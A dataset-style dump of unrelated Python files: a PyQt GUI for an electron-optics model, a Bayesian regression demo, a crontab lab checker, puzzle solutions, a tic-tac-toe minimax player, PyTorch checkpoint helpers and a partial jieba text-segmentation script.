\"{:.2f}\".format(updefy))\n self.updefylabel_table.setMinimumWidth(80)\n self.lowdefxlabel_table = QLabel('Lower X Deflection = ' + \"{:.2f}\".format(updefx))\n self.lowdefxlabel_table.setMinimumWidth(80)\n self.lowdefylabel_table = QLabel('Lower Y Deflection = ' + \"{:.2f}\".format(updefy))\n self.lowdefylabel_table.setMinimumWidth(80)\n self.defyratiolabel_table = QLabel('Y Deflector Ratio = ' + \"{:.2f}\".format(1))\n self.defxratiolabel_table = QLabel('X Deflector Ratio = ' + \"{:.2f}\".format(1))\n \n hbox_labels = QHBoxLayout()\n hbox_labels.addWidget(self.updefxlabel_table)\n hbox_labels.addWidget(self.updefylabel_table)\n hbox_labels.addWidget(self.lowdefxlabel_table)\n hbox_labels.addWidget(self.lowdefylabel_table)\n hbox_labels.addWidget(self.defxratiolabel_table)\n hbox_labels.addWidget(self.defyratiolabel_table)\n\n vbox = QVBoxLayout()\n vbox.addLayout(hbox_labels)\n self.table.setLayout(vbox)\n\n\nclass BiprismGui():\n '''GUI for the biprism component\n ''' \n def __init__(self, name, deflection, theta):\n '''\n\n Parameters\n ----------\n name : str\n Name of component\n deflection : float\n Deflection angle in Slope units\n theta : int\n Angle of biprism. Determines if the biprism creates deflects in the x or y direction.\n Two options: 0 or 1. 0 for 0 degrees, 1 for 90 degree rotation. \n\n '''\n self.box = QGroupBox(name)\n self.defslider = QSlider(QtCore.Qt.Orientation.Horizontal)\n self.defslider.setTickPosition(QSlider.TickPosition.TicksBelow)\n self.defslider.setMinimum(-2000)\n self.defslider.setMaximum(2000)\n self.defslider.setValue(int(round(deflection*1000)))\n self.defslider.setTickPosition(QSlider.TicksBelow)\n\n self.deflabel = QLabel('Biprism Deflection = ' + \"{:.2f}\".format(deflection))\n self.deflabel.setMinimumWidth(80)\n\n vbox = QVBoxLayout()\n hbox_labels = QHBoxLayout()\n hbox_labels.addWidget(self.deflabel)\n\n hbox = QHBoxLayout()\n hbox.addWidget(self.defslider)\n\n vbox.addLayout(hbox_labels)\n vbox.addLayout(hbox)\n\n self.rotslider = QSlider(QtCore.Qt.Orientation.Horizontal)\n self.rotslider.setTickPosition(QSlider.TickPosition.TicksBelow)\n self.rotslider.setMinimum(0)\n self.rotslider.setMaximum(1)\n self.rotslider.setValue(theta)\n self.rotslider.setTickPosition(QSlider.TicksBelow)\n\n self.rotlabel = QLabel('Rotation (Radians) = ' + \"{:.2f}\".format(theta))\n self.rotlabel.setMinimumWidth(80)\n\n hbox_labels = QHBoxLayout()\n hbox_labels.addWidget(self.rotlabel)\n\n hbox = QHBoxLayout()\n hbox.addWidget(self.rotslider)\n\n vbox.addLayout(hbox_labels)\n vbox.addLayout(hbox)\n\n vbox.addStretch()\n\n self.box.setLayout(vbox)\n \n self.table = QGroupBox(name)\n self.deflabel_table = QLabel('Biprism Deflection = ' + \"{:.2f}\".format(deflection))\n self.rotlabel_table = QLabel('Rotation (Radians) = ' + \"{:.2f}\".format(theta))\n \n hbox = QHBoxLayout()\n hbox_labels = QHBoxLayout()\n hbox_labels.addWidget(self.deflabel_table)\n hbox_labels.addWidget(self.rotlabel_table)\n \n vbox = QVBoxLayout()\n vbox.addLayout(hbox_labels)\n vbox.addLayout(hbox)\n self.table.setLayout(vbox)\n\n# \nclass ModelGui():\n '''Overall GUI of the model\n ''' \n def __init__(self, num_rays, beam_type, gun_beam_semi_angle, beam_tilt_x, beam_tilt_y, beam_radius):\n '''\n\n Parameters\n ----------\n num_rays : int\n Number of rays in the model\n beam_type : str\n Type of initial beam: Axial, paralell of point. 
\n gun_beam_semi_angle : float\n Semi angle of the beam \n beam_tilt_x : float\n Initial x tilt of the beam in radians\n beam_tilt_y : float\n Initial y tilt of the beam in radians\n '''\n self.box = QGroupBox('Model Settings')\n self.rayslider = QSlider(QtCore.Qt.Orientation.Horizontal)\n self.rayslider.setTickPosition(QSlider.TickPosition.TicksBelow)\n self.rayslider.setMinimum(4)\n self.rayslider.setMaximum(15)\n self.rayslider.setValue(int(np.log2(num_rays)))\n self.rayslider.setTickPosition(QSlider.TicksBelow)\n\n self.raylabel = QLabel(str(num_rays))\n self.raylabel.setMinimumWidth(80)\n self.modelraylabel = QLabel('Number of Rays')\n\n vbox = QVBoxLayout()\n vbox.addStretch()\n\n hbox = QHBoxLayout()\n hbox.addWidget(self.rayslider)\n hbox.addSpacing(15)\n hbox.addWidget(self.raylabel)\n\n hbox_labels = QHBoxLayout()\n hbox_labels.addWidget(self.modelraylabel)\n hbox_labels.addStretch()\n\n vbox.addLayout(hbox_labels)\n vbox.addLayout(hbox)\n\n self.beamangleslider = QSlider(QtCore.Qt.Orientation.Horizontal)\n self.beamangleslider.setTickPosition(QSlider.TickPosition.TicksBelow)\n self.beamangleslider.setMinimum(0)\n self.beamangleslider.setMaximum(157)\n self.beamangleslider.setValue(int(round(gun_beam_semi_angle, 2)*100))\n self.beamangleslider.setTickPosition(QSlider.TicksBelow)\n\n self.beamanglelabel = QLabel(str(round(gun_beam_semi_angle, 2)))\n self.beamanglelabel.setMinimumWidth(80)\n self.modelbeamanglelabel = QLabel('Axial/Paralell Beam Semi Angle')\n\n hbox = QHBoxLayout()\n hbox.addWidget(self.beamangleslider)\n hbox.addSpacing(15)\n hbox.addWidget(self.beamanglelabel)\n hbox_labels = QHBoxLayout()\n hbox_labels.addWidget(self.modelbeamanglelabel)\n hbox_labels.addStretch()\n vbox.addLayout(hbox_labels)\n vbox.addLayout(hbox)\n\n self.beamwidthslider = QSlider(QtCore.Qt.Orientation.Horizontal)\n self.beamwidthslider.setTickPosition(QSlider.TickPosition.TicksBelow)\n self.beamwidthslider.setMinimum(-100)\n self.beamwidthslider.setMaximum(99)\n self.beamwidthslider.setValue(1)\n self.beamwidthslider.setTickPosition(QSlider.TicksBelow)\n\n self.beamwidthlabel = QLabel('0')\n self.beamwidthlabel.setMinimumWidth(80)\n self.modelbeamwidthlabel = QLabel('Paralell Beam Width')\n\n hbox = QHBoxLayout()\n hbox.addWidget(self.beamwidthslider)\n hbox.addSpacing(15)\n hbox.addWidget(self.beamwidthlabel)\n hbox_labels = QHBoxLayout()\n hbox_labels.addWidget(self.modelbeamwidthlabel)\n hbox_labels.addStretch()\n vbox.addLayout(hbox_labels)\n vbox.addLayout(hbox)\n\n self.checkBoxAxial = QCheckBox(\"Axial Beam\")\n\n self.checkBoxPoint = QCheckBox(\"Point Beam\")\n\n self.checkBoxParalell = QCheckBox(\"Paralell Beam\")\n\n self.checkBoxParalell.stateChanged.connect(\n partial(self.uncheck, self.checkBoxParalell))\n self.checkBoxPoint.stateChanged.connect(\n partial(self.uncheck, self.checkBoxPoint))\n self.checkBoxAxial.stateChanged.connect(\n partial(self.uncheck, self.checkBoxAxial))\n\n hbox.addWidget(self.checkBoxAxial)\n hbox.addWidget(self.checkBoxPoint)\n hbox.addWidget(self.checkBoxParalell)\n\n if beam_type == 'axial':\n self.checkBoxAxial.setChecked(True)\n elif beam_type == 'paralell':\n self.checkBoxParalell.setChecked(True)\n elif beam_type == 'point':\n self.checkBoxPoint.setChecked(True)\n\n hbox = QHBoxLayout()\n hbox_labels = QHBoxLayout()\n self.anglelabel = QLabel('Beam Tilt Offset')\n hbox_labels.addWidget(self.anglelabel)\n\n self.xanglelabel = QLabel(\n 'Beam Tilt X (Radians) = ' + \"{:.3f}\".format(beam_tilt_x))\n self.xangleslider = 
QSlider(QtCore.Qt.Orientation.Horizontal)\n self.xangleslider.setTickPosition(QSlider.TickPosition.TicksBelow)\n self.xangleslider.setMinimum(-200)\n self.xangleslider.setMaximum(200)\n self.xangleslider.setValue(0)\n self.xangleslider.setTickPosition(QSlider.TicksBelow)\n\n self.yanglelabel = QLabel(\n 'Beam Tilt Y (Radians) = ' + \"{:.3f}\".format(beam_tilt_y))\n self.yangleslider = QSlider(QtCore.Qt.Orientation.Horizontal)\n self.yangleslider.setTickPosition(QSlider.TickPosition.TicksBelow)\n self.yangleslider.setMinimum(-200)\n self.yangleslider.setMaximum(200)\n self.yangleslider.setValue(0)\n self.yangleslider.setTickPosition(QSlider.TicksBelow)\n\n hbox.addWidget(self.xangleslider)\n hbox.addWidget(self.xanglelabel)\n\n hbox.addWidget(self.yangleslider)\n hbox.addWidget(self.yanglelabel)\n\n vbox.addLayout(hbox_labels)\n vbox.addLayout(hbox)\n\n self.view_label = QLabel('Set Camera View')\n self.init_button = QPushButton('Initial View')\n self.x_button = QPushButton('X View')\n self.y_button = QPushButton('Y View')\n\n hbox_label = QHBoxLayout()\n hbox_label.addWidget(self.view_label)\n hbox_push_buttons = QHBoxLayout()\n hbox_push_buttons.addWidget(self.init_button)\n hbox_push_buttons.addSpacing(15)\n hbox_push_buttons.addWidget(self.x_button)\n hbox_push_buttons.addSpacing(15)\n hbox_push_buttons.addWidget(self.y_button)\n\n vbox.addLayout(hbox_label)\n vbox.addLayout(hbox_push_buttons)\n\n self.box.setLayout(vbox)\n\n def uncheck(self, btn):\n '''Determines which button is checked, and unchecks others\n\n Parameters\n ----------\n btn : Pyqt5 Button\n '''\n # checking if state is checked\n if btn.isChecked() == True:\n\n # if first check box is selected\n if btn == self.checkBoxAxial:\n\n # making other check box to uncheck\n self.checkBoxParalell.setChecked(False)\n self.checkBoxPoint.setChecked(False)\n\n # if second check box is selected\n elif btn == self.checkBoxParalell:\n\n # making other check box to uncheck\n self.checkBoxAxial.setChecked(False)\n self.checkBoxPoint.setChecked(False)\n\n # if third check box is selected\n elif btn == self.checkBoxPoint:\n\n # making other check box to uncheck\n self.checkBoxAxial.setChecked(False)\n self.checkBoxParalell.setChecked(False)\n\n\nclass ApertureGui():\n '''GUI for the aperture component\n ''' \n def __init__(self, name, min_radius, max_radius, inner_radius, x, y):\n '''\n\n Parameters\n ----------\n name : str\n Name of component\n min_radius : float\n Minimum radius of the aperture\n max_radius : float\n Max radius of the aperture\n inner_radius : float\n Initial inner radius of the aperture\n x : float\n X position of component\n y : float\n y position of component\n '''\n self.box = QGroupBox(name)\n self.radiusslider = QSlider(QtCore.Qt.Orientation.Horizontal)\n self.radiusslider.setTickPosition(QSlider.TickPosition.TicksBelow)\n self.radiusslider.setMinimum(int(round(1)))\n self.radiusslider.setMaximum(int(round(max_radius*1000)))\n self.radiusslider.setValue(int(round(inner_radius*1000)))\n self.radiusslider.setTickPosition(QSlider.TicksBelow)\n\n self.radiuslabel = QLabel('Aperture Radius = ' +\n \"{:.2f}\".format(inner_radius))\n self.radiuslabel.setMinimumWidth(80)\n\n vbox = QVBoxLayout()\n vbox.addStretch()\n\n hbox = QHBoxLayout()\n hbox.addWidget(self.radiusslider)\n\n hbox_label = QHBoxLayout()\n hbox_label.addWidget(self.radiuslabel)\n\n vbox.addLayout(hbox_label)\n vbox.addLayout(hbox)\n\n self.xslider = QSlider(QtCore.Qt.Orientation.Horizontal)\n 
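# editor's note: position sliders use integer ticks; the initial value set\n        # below is the float position scaled by 100, i.e. int(round(x*1e2)), so\n        # one tick corresponds to a 0.01 change in position.\n        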
self.xslider.setTickPosition(QSlider.TickPosition.TicksBelow)\n self.xslider.setMinimum(-100)\n self.xslider.setMaximum(100)\n self.xslider.setValue(int(round(x*1e2)))\n self.xslider.setTickPosition(QSlider.TicksBelow)\n\n self.xlabel = QLabel('X Position = ' + \"{:.2f}\".format(x))\n self.xlabel.setMinimumWidth(80)\n\n hbox = QHBoxLayout()\n hbox_labels = QHBoxLayout()\n hbox_labels.addWidget(self.xlabel)\n hbox.addSpacing(10)\n hbox.addWidget(self.xslider)\n\n vbox.addLayout(hbox_labels)\n vbox.addLayout(hbox)\n\n self.yslider = QSlider(QtCore.Qt.Orientation.Horizontal)\n self.yslider.setTickPosition(QSlider.TickPosition.TicksBelow)\n self.yslider.setMinimum(-100)\n self.yslider.setMaximum(100)\n self.yslider.setValue(int(round(y*1e2)))\n self.yslider.setTickPosition(QSlider.TicksBelow)\n\n self.ylabel = QLabel('Y Position = ' + \"{:.2f}\".format(y))\n self.ylabel.setMinimumWidth(80)\n\n hbox = QHBoxLayout()\n hbox_labels = QHBoxLayout()\n hbox_labels.addWidget(self.ylabel)\n hbox.addSpacing(10)\n hbox.addWidget(self.yslider)\n\n vbox.addLayout(hbox_labels)\n vbox.addLayout(hbox)\n\n vbox.addStretch()\n\n self.box.setLayout(vbox)\n \n self.table = QGroupBox(name)\n self.radiuslabel_table = QLabel('Aperture Radius = ' + \"{:.2f}\".format(inner_radius))\n self.xlabel_table = QLabel('X Position = ' + \"{:.2f}\".format(x))\n self.ylabel_table = QLabel('Y Position = ' + \"{:.2f}\".format(y))\n \n hbox = QHBoxLayout()\n hbox_labels = QHBoxLayout()\n hbox_labels.addWidget(self.xlabel_table)\n hbox_labels.addWidget(self.ylabel_table)\n hbox_labels.addWidget(self.radiuslabel_table)\n\n vbox = QVBoxLayout()\n vbox.addLayout(hbox_labels)\n vbox.addLayout(hbox)\n self.table.setLayout(vbox)\n \nclass ExperimentGui():\n '''GUI for the aperture component\n ''' \n def __init__(self):\n '''\n\n Parameters\n ----------\n name : str\n Name of component\n min_radius : float\n Minimum radius of the aperture\n max_radius : float\n Max radius of the aperture\n inner_radius : float\n Initial inner radius of the aperture\n x : float\n X position of component\n y : float\n y position of component\n '''\n self.box = QGroupBox('Experiment')\n self.scanpixelsslider = QSlider(QtCore.Qt.Orientation.Horizontal)\n self.scanpixelsslider.setTickPosition(QSlider.TickPosition.TicksBelow)\n self.scanpixelsslider.setMinimum(2)\n self.scanpixelsslider.setMaximum(8)\n self.scanpixelsslider.setValue(256)\n \n self.scanpixelslabel = QLabel('Scan pixels = ' + str(int(self.scanpixelsslider.value())))\n self.scanpixelslabel.setMinimumWidth(80)\n \n self.overfocuslabel = QLabel('Overfocus = Not Set')\n self.overfocuslabel.setMinimumWidth(80)\n \n self.cameralengthlabel = QLabel('Camera length = Not Set')\n self.cameralengthlabel.setMinimumWidth(80)\n \n self.semiconvlabel = QLabel('Semi conv = Not Set')\n self.semiconvlabel.setMinimumWidth(80)\n \n self.scanpixelsizelabel = QLabel('Scan pixel size = Not Set')\n self.scanpixelsizelabel.setMinimumWidth(80)\n\n vbox = QVBoxLayout()\n vbox.addStretch()\n\n hbox = QHBoxLayout()\n hbox.addWidget(self.scanpixelsslider)\n hbox.addSpacing(15)\n hbox.addWidget(self.scanpixelslabel)\n hbox.addSpacing(15)\n hbox.addWidget(self.overfocuslabel)\n hbox.addSpacing(15)\n hbox.addWidget(self.semiconvlabel)\n hbox.addSpacing(15)\n hbox.addWidget(self.scanpixelsizelabel)\n hbox.addSpacing(15)\n hbox.addWidget(self.cameralengthlabel)\n \n \n vbox.addLayout(hbox)\n \n self.FOURDSTEM_experiment_button = QPushButton('Run 4D STEM Experiment')\n \n hbox_push_buttons = QHBoxLayout()\n 
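# single action button; the actual 4D STEM scan is presumably connected to\n        # this button's clicked signal elsewhere in the application.\n        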
hbox_push_buttons.addWidget(self.FOURDSTEM_experiment_button)\n vbox.addLayout(hbox_push_buttons)\n\n self.box.setLayout(vbox)\n\n","repo_name":"AMCLab/TemGymBasic","sub_path":"src/temgymbasic/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":37672,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"72"} +{"seq_id":"31416794359","text":"import numpy as np\nfrom numpy.linalg import inv, norm\nimport matplotlib.pyplot as plt\n\n\n# Define the polynomial model\ndef polynomial_model(M, x):\n polynomial_terms = []\n for i in range(M+1):\n polynomial_terms.append(np.array(x)**i)\n return polynomial_terms\n\n\n# Define Sine function\ndef sinusoidal(x):\n return np.sin(2 * np.pi * x)\n\n\n# Function for generating training data , where y_train = y_true + gaussian noise\ndef generate_toy_data(sample_size, std):\n x = np.linspace(0, 1, sample_size)\n y = sinusoidal(x) + np.random.normal(scale=std, size=x.shape)\n return x, y\n\n# Function that predicts m and s^2\ndef bayesian_prediction(a, b, Phi_test, Phi_train, y_train):\n Sigma = np.linalg.inv(a * np.eye(M + 1) + b * Phi_train.T @ Phi_train)\n m = b * Phi_test @ Sigma @ Phi_train.T @ y_train\n sigma = 1 / b + Phi_test @ Sigma @ Phi_test.T\n var = np.diag(sigma)\n\n return m, var\n\n\n# Number of training data points\nN = 10\n\n# Degree of polynomial for φ(x)\nM = 9\n\n# Gaussian noise\nm_noise = 0\nbeta = 11.1\ns_noise = 1/beta\n\n# Prior parameter\nalpha = 0.0005\n\n\n# Generate train data\nx_train, y_train = generate_toy_data(sample_size=N, std=s_noise)\n\n# Generate Φ(x)\nPhi_train = []\nfor i in range(N):\n Phi_train.append(polynomial_model(M, x_train[i]))\nPhi_train = np.array(Phi_train)\n\n# Generate test data\nx_test = np.linspace(0, 1, 1000)\nPhi_test = np.array([polynomial_model(M=M, x=x) for x in x_test])\n\n# Calculate the true and the predicted value\nt = sinusoidal(x_test)\nm, var = bayesian_prediction(a=alpha, b=beta, Phi_test=Phi_test, Phi_train=Phi_train, y_train=y_train)\n\n\nplt.figure()\nplt.scatter(x_train, y_train, facecolor=\"none\", edgecolor=\"mediumseagreen\", s=50, label=\"Training data\")\nplt.plot(x_test, t, color='steelblue', label='True Model')\nplt.plot(x_test, m, color='firebrick', label='Bayesian Linear Regression')\nplt.fill_between(x_test, m - var, m + var, alpha=0.2, color='firebrick', label='Variance')\nplt.xlabel('$x$')\nplt.xlim(-0.02, 1.01)\nplt.ylabel('$y$')\nplt.title('Bayesian Linear Regression vs True Model')\nplt.legend()\nplt.savefig('./output/ex5/bayesian_approach.pdf')\n\n\n\n","repo_name":"aspav/DSIT","sub_path":"MLCB/Supervised Learning/ex_5.py","file_name":"ex_5.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"8711144583","text":"import subprocess\nimport sys\nimport os\nimport time\nimport re\nimport chardet\n\ndef check_cron_job_exists():\n try:\n result = subprocess.run([\"sudo\", \"crontab\", \"-u\", \"gde\", \"-l\"], stdout=subprocess.PIPE, text=True)\n match = re.search(r'\\*/2 \\* \\* \\* \\*', result.stdout)\n return match is not None\n except subprocess.CalledProcessError:\n return False\n\ndef detect_encoding(file_path):\n with open(file_path, 'rb') as f:\n result = chardet.detect(f.read())\n return result['encoding']\n\ndef check_file_content(file_path):\n if not os.path.exists(file_path):\n return False\n\n encoding = detect_encoding(file_path)\n\n with open(file_path, 'r', encoding=encoding) as f:\n lines = 
f.readlines()\n\n if not lines:\n return False\n\n last_line = lines[-1].strip()\n\n # Check if the last line in the file contains a timestamp\n match = re.search(r'\\d{4}\\. \\w{3}\\. \\d{1,2}\\., \\w+, \\d{2}:\\d{2}:\\d{2} \\w+', last_line)\n return match is not None\n\nif __name__ == \"__main__\":\n file_path = \"/tmp/timestamps.txt\"\n\n if check_cron_job_exists():\n print(\"The cron job is configured correctly.\")\n time.sleep(5)\n\n if check_file_content(file_path):\n print(\"The cron job is running and appending to the file.\")\n else:\n print(\"The cron job is running but not appending to the file in the correct format.\")\n sys.exit(1)\n else:\n print(\"The cron job is NOT configured correctly.\")\n sys.exit(1)\n\n","repo_name":"p0m3lO/labs","sub_path":"Basic/task7.py","file_name":"task7.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"483166261","text":"class Solution:\n def reorderLogFiles(self, logs: list[str]) -> list[str]:\n letters = [log for log in logs if log.split()[1].isalpha()]\n digits = [log for log in logs if log.split()[1].isdigit()]\n \n letters.sort(key = lambda x : (x.split()[1:], x.split()[0]))\n return letters + digits\n\nsolution = Solution()\ninput1 = logs = [\"dig1 8 1 5 1\",\"let1 art can\",\"dig2 3 6\",\"let2 own kit dig\",\"let3 art zero\"]\nresult = solution.reorderLogFiles(input1)\nprint(f\"{result}\")","repo_name":"bkim1999/Python-Algorithm-Interview","sub_path":"String Manipulation/3. Reorder Data in Log Files.py","file_name":"3. Reorder Data in Log Files.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14793331512","text":"'''\nGiven an unsorted integer array, \nfind the smallest missing positive integer.\n'''\n\n\nclass Solution:\n def firstMissingPositive(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n nums.append(0)\n n = len(nums)\n for i in range(n):\n if nums[i] < 0 or nums[i] >= n:\n nums[i] = 0\n for i in range(n):\n nums[nums[i]%n] += n\n for i in range(1, n):\n if nums[i] // n == 0:\n return i\n return n","repo_name":"smileshy777/practice","sub_path":"array/hard/first_missing_positive.py","file_name":"first_missing_positive.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10253065941","text":"\"\"\"\nTic Tac Toe Player\n\"\"\"\n\nimport copy\nimport math\nimport sys\n\nX = \"X\"\nO = \"O\"\nEMPTY = None\nN = 3\n\n\ndef initial_state():\n \"\"\"\n Returns starting state of the board.\n \"\"\"\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],]\ndef player(board):\n \"\"\"\n Returns player who has the next turn on a board.\n \"\"\"\n countX = 0\n countO = 0\n for i in range(N):\n countX = countX + board[i].count(X)\n countO = countO + board[i].count(O)\n \n if ((countX == 0 and countO == 0) or countX == countO):\n return X\n elif (countX > countO):\n return O\n else:\n return X\n\n\ndef actions(board):\n \"\"\"\n Returns set of all possible actions (i, j) available on the board.\n \"\"\"\n actions = set()\n for i in range(N):\n for j in range(N):\n if (board[i][j] is EMPTY):\n actions.add((i, j))\n return actions\n\n\ndef result(board, action):\n \"\"\"\n Returns the board that results from making move (i, j) on the board.\n \"\"\"\n (i, j) = action\n\n \n # invalid action\n 
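# (editor note) a move is valid only when both indices are inside the board\n    # and the target cell is empty; e.g. result(initial_state(), (0, 0)) returns\n    # a fresh board with X placed in the top-left corner.\n    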
if (i < 0 or j < 0 or i >= N or j >= N or board[i][j] is not EMPTY):\n        raise ValueError((i, j))\n    \n    # resulting board\n    resulting = copy.deepcopy(board)\n    resulting[i][j] = player(board)\n    return resulting\n    \n\n\ndef winner(board):\n    \"\"\"\n    Returns the winner of the game, if there is one.\n    \"\"\"\n    # horizontal and vertical \n    for i in range(N):\n        if board[i].count(X) == N or [board[j][i] for j in range(N)].count(X) == N:\n            return X\n        elif board[i].count(O) == N or [board[j][i] for j in range(N)].count(O) == N:\n            return O\n\n    # diagonal\n    if [board[i][i] for i in range(N)].count(X) == N:\n        return X\n\n    if [board[i][i] for i in range(N)].count(O) == N:\n        return O\n    \n    if [board[i][N-i-1] for i in range(N)].count(X) == N:\n        return X\n    \n    if [board[i][N-i-1] for i in range(N)].count(O) == N:\n        return O\n\n    return None\n    \n\ndef terminal(board):\n    \"\"\"\n    Returns True if game is over, False otherwise.\n    \"\"\"\n    # there is winner\n    if winner(board) is not None:\n        return True\n\n    # game is running\n    for i in range(N):\n        for j in range(N):\n            if (board[i][j] is EMPTY):\n                return False\n\n    return True\n\n\ndef utility(board):\n    \"\"\"\n    Returns 1 if X has won the game, -1 if O has won, 0 otherwise.\n    \"\"\"\n    if winner(board) == X:\n        return 1\n    elif winner(board) == O:\n        return -1\n    return 0\n\n\ndef minimax(board):\n    \"\"\"\n    Returns the optimal action for the current player on the board.\n    \"\"\"\n    if terminal(board):\n        return None\n\n    elif player(board) == X:\n        val = -sys.maxsize - 1\n        alpha = -sys.maxsize - 1\n        beta = sys.maxsize\n\n        for a in actions(board):\n            alpha = minvalue(result(board, a), alpha, beta)\n            if (alpha > val):\n                val = alpha\n                action = a\n        return action\n    \n    elif player(board) == O:\n        val = sys.maxsize\n        alpha = -sys.maxsize - 1\n        beta = sys.maxsize\n\n        for a in actions(board):\n            beta = maxvalue(result(board, a), alpha, beta)\n            if (beta < val):\n                val = beta\n                action = a\n        return action\n    \n    \ndef maxvalue(board, alpha, beta):\n    if terminal(board):\n        return utility(board)\n    \n    for action in actions(board):\n        alpha = max(alpha, minvalue(result(board, action), alpha, beta))\n        if (alpha >= beta):\n            return beta\n    \n    return alpha\n\n\ndef minvalue(board, alpha, beta):\n    if terminal(board):\n        return utility(board)\n\n    for a in actions(board):\n        beta = min(beta, maxvalue(result(board, a), alpha, beta))\n        if (beta <= alpha):\n            return alpha\n    \n    return beta","repo_name":"quocthanhp/Tic-Tac-Toe","sub_path":"tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":3915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"8671114781","text":"from alembic import op\nimport sqlalchemy as sa\n\n\"\"\"increase tag elements from 60 to 255 chars\n\nRevision ID: 8df53b0d2c0e\nRevises: 6135a7bd4425\nCreate Date: 2021-03-29 14:44:35.607053\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '8df53b0d2c0e'\ndown_revision = '6135a7bd4425'\n\nTABLE = 'tags'\n\n\ndef upgrade():\n    op.alter_column(TABLE, 'tag', existing_type=sa.String(60),\n                    type_=sa.String(255), existing_nullable=False)\n","repo_name":"openstack/neutron","sub_path":"neutron/db/migration/alembic_migrations/versions/xena/expand/8df53b0d2c0e_increase_tag_elements_from_60_to_255_.py","file_name":"8df53b0d2c0e_increase_tag_elements_from_60_to_255_.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":1353,"dataset":"github-code","pt":"72"}
+{"seq_id":"44046954895","text":"\nimport os\nimport 
os.path as osp\nimport shutil\nimport torch\nimport torch.nn as nn\nfrom torch.nn.parallel import DistributedDataParallel\n\n\nclass BaseModel():\n\n    @property\n    def name(self):\n        return 'BaseModel'\n\n    def initialize(self, opt):\n        self.opt = opt\n        self.isTrain = opt.isTrain\n        self.Tensor = torch.cuda.FloatTensor\n        self.save_dir = osp.join(opt.checkpoints_dir)\n\n    # helper saving function that can be used by subclasses\n    def save_network(self, network, model_name, epoch, stage_id=None):\n        # keep the \".pth\" suffix in sync with load_network below\n        if stage_id is None:\n            save_filename = f\"{epoch}_net_{model_name}.pth\"\n        else:\n            save_filename = f\"{epoch}_net_{model_name}_stage_{stage_id:02d}.pth\"\n        save_path = osp.join(self.save_dir, save_filename)\n        if isinstance(network, nn.DataParallel) or isinstance(network, DistributedDataParallel):\n            network = network.module\n        state_dict = network.state_dict()\n        for key, param in state_dict.items():\n            state_dict[key] = param.cpu()\n        torch.save(state_dict, save_path)\n\n    def save_info(self, save_info, epoch, stage_id=None):\n        if stage_id is None:\n            save_filename = f'{epoch}_info.pth'\n        else:\n            save_filename = f'{epoch}_info_stage_{stage_id:02d}.pth'\n        save_path = osp.join(self.save_dir, save_filename)\n        torch.save(save_info, save_path)\n\n    # helper loading function that can be used by subclasses\n    def load_network(self, network, model_name, epoch, stage_id=None):\n        if stage_id is None:\n            save_filename = f\"{epoch}_net_{model_name}.pth\"\n        else:\n            save_filename = f\"{epoch}_net_{model_name}_stage_{stage_id:02d}.pth\"\n        save_path = osp.join(self.save_dir, save_filename)\n        if not osp.exists(save_path):\n            print(f\"{save_path} does not exist !!!\")\n            return False\n        else:\n            if self.opt.dist:\n                network.module.load_state_dict(torch.load(\n                    save_path, map_location=lambda storage, loc: storage.cuda(torch.cuda.current_device())))\n            else:\n                saved_weights = torch.load(save_path)\n                network.load_state_dict(saved_weights)\n            return True\n\n    def load_info(self, epoch):\n        save_filename = '{}_info.pth'.format(epoch)\n        save_path = osp.join(self.save_dir, save_filename)\n        # saved_info = torch.load(save_path)\n        if self.opt.dist:\n            saved_info = torch.load(save_path, map_location=lambda storage, loc: storage.cuda(\n                torch.cuda.current_device()))\n        else:\n            saved_info = torch.load(save_path)\n        return saved_info","repo_name":"penincillin/IHMR","sub_path":"src/models/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":2697,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"72"}
+{"seq_id":"10108653468","text":"import random\n\n\ndef get_random_string(length: int) -> str:\n    chars = list(range(48, 58)) + list(range(65, 91)) + list(range(97, 123))\n\n    result = \"\"\n    for i in range(length):\n        char_code = random.choice(chars)\n        result += chr(char_code)\n\n    return result\n","repo_name":"Videnin/Hillel_Videnin","sub_path":"HW_32.py","file_name":"HW_32.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"70128472874","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/1/2 20:37\n# @Author : LeonHardt\n# @File : jieba_cut.py\n\n\nimport os\nimport glob\nimport codecs\n\n\nimport jieba\nimport jieba.analyse\n\n# -------------------------------------------\n# file direction set\n# load user_dict\n# -------------------------------------------\njieba.load_userdict('all_dict.txt')\n\n\n# ------------------------------------------\n# article cut\n\n\ndef file_cut(path, data_name):\n    \"\"\"\n    
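Cut one text file into jieba tokens and write the space-separated result\n    to <path>/out_file/<data_name>, dropping words found in the stop list.\n\n    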
